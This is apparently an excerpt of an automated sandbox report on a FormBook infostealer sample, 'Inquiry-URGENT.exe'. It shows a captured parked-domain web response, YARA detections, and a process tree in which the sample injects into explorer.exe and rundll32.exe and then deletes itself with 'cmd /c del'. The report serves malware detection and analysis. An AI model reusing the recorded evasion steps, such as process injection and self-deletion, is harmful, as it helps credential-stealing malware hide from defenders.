6d 61 70 70 65 64 27 22 20 2f 3e 3c 74 69 74 6c 65 3e 54 72 61 73 70 6f 72 74 65 73 65 6d 6d 61 6e 75 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d
                                          Data Ascii: 3e56<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://findquickresultsnow.com/px.js?ch=1"></script><script type="text/javascript" src="http://findquickresultsnow.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://findquickresultsnow.com/sk-logabpstatus.php?a=STMvMU1NUXNuczg2amZOVXF2dW1UNHVqaGVZMDl2R3h3WHhWRXFITkk3RGVlMTRVeWQ2cXdQa01GTDlGc3VIU3ZOS0Z3bkUyd0pFZlY0SkVGSTdvT3Y5VXExTVhvWUZSenZCZ24rVXFpVHZvZXpWOW9EL0NxVW0zOGdKdlFBeEE=&b="+abp;document.body.appendChild(imglog);if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='trasportesemmanuel.com' d='entity_mapped'" /><title>Trasportesemmanuel.com</title><m


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: Inquiry-URGENT.exe PID: 6760 Parent PID: 5396

                                          General

                                          Start time:17:53:57
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\Inquiry-URGENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\Inquiry-URGENT.exe'
                                          Imagebase:0x710000
                                          File size:443904 bytes
                                          MD5 hash:001127EA6A36D3B93E8C54FF1B8F22B8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.671240839.0000000002B43000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Analysis Process: Inquiry-URGENT.exe PID: 7112 Parent PID: 6760

                                          General

                                          Start time:17:54:00
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\Inquiry-URGENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\Inquiry-URGENT.exe
                                          Imagebase:0x5d0000
                                          File size:443904 bytes
                                          MD5 hash:001127EA6A36D3B93E8C54FF1B8F22B8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 7112

                                          General

                                          Start time:17:54:02
                                          Start date:27/09/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Analysis Process: rundll32.exe PID: 4684 Parent PID: 3424

                                          General

                                          Start time:17:54:35
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                          Imagebase:0xb90000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Analysis Process: cmd.exe PID: 3080 Parent PID: 4684

                                          General

                                          Start time:17:54:40
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 3532 Parent PID: 3080

                                          General

                                          Start time:17:54:41
                                          Start date:27/09/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >